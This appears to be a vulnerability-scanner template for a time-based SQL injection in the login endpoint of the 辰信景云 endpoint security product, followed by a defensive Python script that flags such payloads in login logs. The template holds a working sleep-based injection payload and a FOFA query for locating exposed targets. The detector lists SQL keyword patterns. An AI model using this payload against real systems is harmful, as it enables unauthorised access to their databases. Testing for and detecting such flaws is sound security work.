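Vulnerability Description
The login endpoint of the 辰信领创 辰信景云终端安全管理系统 (辰信景云 Endpoint Security Management System) is vulnerable to SQL injection. An attacker can exploit the vulnerability to obtain sensitive information from the database.
FOFA: "辰信景云终端安全管理系统"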
id: v-secure-cloud-login-sqli

info:
  name: 辰信领创 辰信景云终端安全管理系统 login SQL注入
  author: zan8in
  severity: high
  verified: true
  description: |
    辰信领创 辰信景云终端安全管理系统 login存在 SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息
    FOFA: "辰信景云终端安全管理系统"
  reference:
    - https://peiqi.wgpsec.org/wiki/webapp/%E8%BE%B0%E4%BF%A1%E9%A2%86%E5%88%9B/%E8%BE%B0%E4%BF%A1%E9%A2%86%E5%88%9B%20%E8%BE%B0%E4%BF%A1%E6%99%AF%E4%BA%91%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
  tags: v-secure,sqli
  created: 2023/08/09

rules:
  # r0: timed request; the response must take between 10 and 11 seconds
  r0:
    request:
      method: POST
      path: /api/user/login
      body: |
        captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(10))a)='
    expression: response.body.bcontains(b'"errorcode":') && response.body.bcontains(b'"error_str":') && response.latency <= 11000 && response.latency >= 10000
  # r1: baseline request with a plain username; the response must arrive within 10 seconds
  r1:
    request:
      method: POST
      path: /api/user/login
      body: |
        captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin
    expression: response.body.bcontains(b'"errorcode":') && response.body.bcontains(b'"error_str":') && response.latency <= 10000
  # r2: repeat of r0, so a single slow response is not reported as a finding
  r2:
    request:
      method: POST
      path: /api/user/login
      body: |
        captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(10))a)='
    expression: response.body.bcontains(b'"errorcode":') && response.body.bcontains(b'"error_str":') && response.latency <= 11000 && response.latency >= 10000
# A target is reported only when all three rules match
expression: r0() && r1() && r2()
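
For the defending side, the following added example (not part of the original template or of the product) triages login requests for the time-based pattern the rules above rely on: SQL syntax in the `username` field of a POST to `/api/user/login`, combined with an abnormally slow response. The record layout, the `SLOW_MS` threshold and the sample records are assumptions; it presumes a reverse proxy or WAF that logs form bodies and latency.

```python
import re
from urllib.parse import parse_qs

LOGIN_PATH = "/api/user/login"
# SQL constructs that have no place in a username field
SQL_PATTERNS = re.compile(r"sleep\s*\(|benchmark\s*\(|\bselect\b|\bunion\b", re.I)
SLOW_MS = 5000  # assumed threshold: a normal login answers far faster than this

# Constructed sample records: (source IP, method, path, form body, latency in ms)
SAMPLE_LOG = [
    ("198.51.100.7", "POST", "/api/user/login",
     "captcha=&password=x&username=alice", 120),
    ("203.0.113.9", "POST", "/api/user/login",
     "captcha=&password=x&username=admin'and(select*from(select+sleep(10))a)='", 10043),
    ("203.0.113.9", "POST", "/api/user/login",
     "captcha=&password=x&username=admin", 95),
    ("198.51.100.7", "POST", "/api/user/login",
     "captcha=&password=x&username=o'brien", 110),
    ("192.0.2.4", "GET", "/index.html", "", 30),
]

def classify(record):
    """Return None for benign traffic, otherwise a triage verdict string."""
    ip, method, path, body, latency_ms = record
    if method != "POST" or path != LOGIN_PATH:
        return None
    # parse_qs decodes '+' and %xx escapes, so encoded payloads are matched too
    fields = parse_qs(body, keep_blank_values=True)
    username = " ".join(fields.get("username", []))
    if not SQL_PATTERNS.search(username):
        return None
    # A slow answer means the injected delay most likely ran inside the database
    return "injection-delayed" if latency_ms >= SLOW_MS else "injection-attempt"

def scan(log):
    """Return (source IP, verdict) for every suspicious login request."""
    return [(r[0], verdict) for r in log if (verdict := classify(r))]

if __name__ == "__main__":
    for ip, verdict in scan(SAMPLE_LOG):
        print(ip, verdict)
```

An `injection-delayed` verdict indicates the payload reached the database and should be handled as a likely compromise of the data it can read, while `injection-attempt` indicates probing that was blocked or not executed.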